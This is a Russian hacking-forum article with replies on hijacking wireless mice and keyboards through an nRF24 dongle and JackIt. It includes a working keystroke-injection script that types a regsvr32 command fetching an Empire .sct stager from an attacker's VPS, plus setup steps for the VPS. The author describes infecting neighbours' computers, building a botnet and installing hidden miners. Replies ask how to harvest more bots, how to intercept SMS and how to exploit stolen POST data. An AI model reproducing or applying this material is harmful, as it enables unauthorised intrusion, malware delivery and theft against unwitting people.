Статья Необычный взлом! с помощью чипа NRF24 и Hackrf-one или просто SDR тунер

"А не написать ли мне статью?" Ходил я с этими мыслями три дня и четыре ночи с ней спал .... Авось кто нить прочитает да и дополнит чем нибудь дельным.... Эх оглянувшись на все, думаю все же напишу-ка))

Этот взлом не раз описывался в бурж-нете да и на хабре была

Ссылка скрыта от гостей

но все же интересно пройти через все невзгоды самому и подробно описать так сказать весь процесс создания этой атаки.

Вы спросите а нах нам еще про это читать когда все и так уже описано не раз и по русски, нет, отвечу я вам, методика мне показалось очень актуальной и не умрет, а наоборот будет цвести и пахнуть с прогрессом что нам и на руку!

И так поехали нам понадобится VPS на базе убунту или дебиан что в принципе одно и тоже с внешним айпи адресом желательно где нить в Гватемале!)) или в любой другой стране Тайвань, в идеале там где обитают попуасы которые про Россию слышали только раз в жизни и то не помнят где и от кого!))) Ну это о анонимности, мы же занимаемся не благим делом. ДА!? Сетевые разбойники......

Ноутбук, нетбук с не убитым аккумулятором, а то будет конец фильма на самом интересном месте, кто смотрел "жулиану" в 90-ых тот меня поймет или "просто Мария" да.. Как сейчас помню как я в голготках и в юном возрасте кулаками, об колени бил себя в растройстве по вечерам что не узнал как там дальше в сериале найдет ли Круз Кастилио потерявшуюся Идн или нет ...

О главном опишу два варианта бюджетный и дорогой начну с первого покупаем на али вот эту стоит всего 5 баксов доставка быстрая продавашка вроде шустренько все отправляет!

Получили, прекрасно нужно будет припаять к нему антенну для большего радиуса действия вот как

Ссылка скрыта от гостей

в итоге должно получится вот

Ссылка скрыта от гостей

Антену можно любую на 2.4 Ггц подойдет от вайфай адаптера роутера и т.д. они тоже на этих частотах работают в основном есть конечно же и на 5Ггц вайфай но в наших широтах он встречается редко...

Далее идем на наш (Гватемальский) ВПС и устанавливаем софт, а именно нынче в тренде EMPIRE и сервис Apache2 который устанавливается простой командой:sudo apt-get install apache2 ну и запускаем его! sudo service apache2 start и еще очень важный момент устанавливаем утилиту SCREEN она предназначена для того чтобы запущенный процесс, скрипт не закрывался когда вы покидаете окно терминала управления вашим ВПС (то есть работал сутками) без Вашего присутствия это очень важный момент!

Итак идем в папку с empire устанавливаем и запускаем утилиту screen командой screen -S empire (создастся новая вкладка для него чтобы он фурычил без Вас)запускаем ./empire создаем: usestager windows/launcher_sct на мой взгляд он самый без палевный в данный момент командой INFO (маленькими) узнаем его настройки в строке OutFile вбиваем путь до сервиса апач /var/www/html/ название файла.sct настраиваем Listener подробно оставаться на этом не буду на борде много инфы на эту тему запуск, установка и т.д. по желанию можно настроить autorun persistence что бы Ваш зверек оставался в (вражеской)системе подольше)) описано

Ссылка скрыта от гостей

нажимаем CNTRL+A и D закрывая этим самым вкладку с empire . Идем домой на родной раб. стол подклчаем наш девайс-донгл качаем для него утилиту отсюда устанавливаем ! В папке с Jackit есть файлик pspwn открываем его в leafpad-e все стираем и пишем (ох сколько я часов потратил на все это что бы понять что туда писать)

GUI r
DELAY 1000       ждем 1000 мл.сек
WIN STRING r     запускается run
DELAY 300          ждет (так как машины не у всех быстрые, покааа сообразит))
SHIFT ALT          меняется раскладка клавиатуры т.к. у всех по умолч. стоит русская
DELAY 300
STRING regsvr32 /s /n /u /i:http://(IP-вашего ВПС)/(имя файла которого мы создали в empire).sct scrobj.dll   << самый вкусный процесс в run печатается этот текст)))
ENTER     
DELAY 400
STRING exit         ну Вы поняли..
ENTER

Сохраняем запускаем скрипт jackit командой : ./jackit.py --script pspwn
ждем... Мне лично долго ждать не пришлось дело было вечером выходной много-этажка... поймал 4 -ех мышей запустил атаку 3 машины попались!)) поднялся на пару этажей выше еще парочка из 5 попались зашел на ВПС а там уже почти БОТНЕТ))) закинул скрытые майнеры пожинаю плоды, по двору правда еще не гулял...

Прошла неделя.... Я задался вопросом "так почему же ловит к примеру 5-6 мышей а заражается 2-3 машины?" Думаю Вы уже догадались что у нас в продаже идут (радио) мышки отдельно от клавиатуры и я нашел ответ как заставить вражеский курсор набирать на экранной клавиатуре (наш) текст в run powershell ... об этом позже, уже понадобится hackrf , GNUradio это есть дорогой вариант исполнения загрузки пэйлода

Для эффективности сего пред ставленого Вам метода можно еще прикупить

Ссылка скрыта от гостей

на 2.4Ghz дабы покрыть все радио мыши в районе данный девайс уже спешит ко мне из Китая как приедет отпишу эффективность

ПС: моя первая статья, просьба сильно ногами не пинать меня т.к. за сочинения в школе у меня были двойки((( Простите за ВОДУ в начале! и продолжение следует так у меня в арсенале еще имеется PROXMARK, HACKRF-one и много чего еще интересного ..

 

[~localhost]

Не могу установить jackit. помогите

root:~# cd jackit/
root:~/jackit# ls
bin  build  examples  jackit  README.md  requirements.txt  setup.py  tox.ini
root:~/jackit# ./setup.py install
/usr/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'install_requires'
  warnings.warn(msg)
running install
running build
running build_py
running build_scripts
running install_lib
running install_scripts
changing mode of /usr/local/bin/jackit to 755
running install_egg_info
Removing /usr/local/lib/python2.7/dist-packages/JackIt-0.1.0.egg-info
Writing /usr/local/lib/python2.7/dist-packages/JackIt-0.1.0.egg-info
root:~/jackit#

Делал все не так, но теперь вроде делаю все правльно но все же ошибки

pip install -e .
Obtaining file:///root/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Requirement already satisfied: pyusb==1.0.0 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (1.0.0)
Requirement already satisfied: tabulate==0.7.5 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (0.7.5)
Requirement already satisfied: six==1.10.0 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (1.10.0)
requests 2.18.4 has requirement urllib3<1.23,>=1.21.1, but you'll have urllib3 1.23 which is incompatible.
Installing collected packages: JackIt
  Found existing installation: JackIt 0.1.0
Cannot uninstall 'JackIt'. It is a distutils installed project and thus we cannot accurately determine which files belong to it which would lead to only a partial uninstall.

 

[InetTester]

Если я верно понимаю то данный модуль nrf24 можно заставить работать как полноценный wifi адаптер или bluetooth? Естественно предварительно прошив его.
Т.е это своего рода SDR адаптер который работает в очень узком диапазоне?

 

[Петручо]

вижу на али есть crazyradio донглы по 600 рублей и по 3 тыс . вторые с антенной .
чем они отличаются кроме антенны и цены ? в дешевых чувствительность слабая ?
и кто провабол , примерно сколько собирают ботов с многоэтажки например этажей в 9 или 16 ?

и еще вопрос - дорогой вариант по эффективности намного лучше чем дешевый ?
hackrf купить не проблема . но пишут что gnuradio заморочена . хотя если выхлоп с нее будет , то освоить ее стоит.

 

[InetTester]

Отличаются практически ничем(я бегло используя разницу не заметил), юзаю китайский уже около года.
Сегодня набравшись смелости скажу что вещь по большей своей части уже бестолковая, так как все серьезные(и не только) производители используют хопинг, т.е ты просто не успеешь переключатся между всеми каналами, ну или хакать только 'динозавров' 2010 года которые уже мало у кого имеются.
Если есть выбор/деньги то бери Hackrf(есть уже и более интересные девайсы) ибо эти вещи сравнивать даже нельзя, он как швейцарский нож, теоретически сможешь захватить весь спектр и потом уже дома спокойно его анализировать.

 

[Петручо]

на hackrf почитав уже и рассчитываю , но много много вопросов , тоже читал про что узявимость исправили пару лет назад в большинстве беспроводных клав и мышей . но у народа еще куча старых , так что интересует пробив .
и не подскажешь , через hackrf новые перехватывать может ? как я понял такие вендоры как логитек и ему подобные уже и шифровку включили . это обойти можно или даже с hackrf только нешифрованные каналы ?

 

[InetTester]

Здесь еще речь даже не дошла до шифрования, у тебя просто не получиться получить все данные c помощью crazyradio, так как ты не знаешь какой канал будет следующим, а с hackrf ты просто будешь снифать всю полосу, и уже потом сможешь 'извлечь' нужные тебе данные(я очень приблизительно описал сейчас)

 

[Петручо]

то что crazyradio не даст перехватить скачка частот и работать еще и по чисто мышкам (без клавиатуры) я понял .
но там описан софт , в случае с hackrf только упомянули gnuradio, как там дальше даже намека не дали , хотелось уточнить что делать с ним и есть ли еще дополнительный софт . ну еще вопрос по покупке hackrf , там несколько вариантов покупки , просто плата hackrf и бандлы с антеннами и кабелями , есть смысл в тех антеннах и корпусах ?
или можно купить просто плату , у ней усилитель что в статье , там 2.4ггц антенна уже в комплекте (да и есть 5dbi антенна от вайфайки) .
и в бандле заметил еще антенну от gsm/3G/LTE .
то что она может перехватить сигнал я понял , а вот расшифровать его возможно ? голос пока не интересует , а вот смс и интернет пакеты даже очень .

 

[gajam]

у меня с web cruiser остались post данные, как ими можно воспользоватся, мне нужны быза емейлов

 

[Петручо]

читал не раз что hackrf не самая мощная по возможностям карта (она не дуплексная), что есть еще мощнее чем hackrf ?
кто нибудь щупал bladerf 2.0 , по частотам как hackrf и она емнип полный дуплекс.
больше интересует поддержка софта , по до что софта больше ?
и можно ли через hackrf пехеватывать СМС , разговоры не интересуют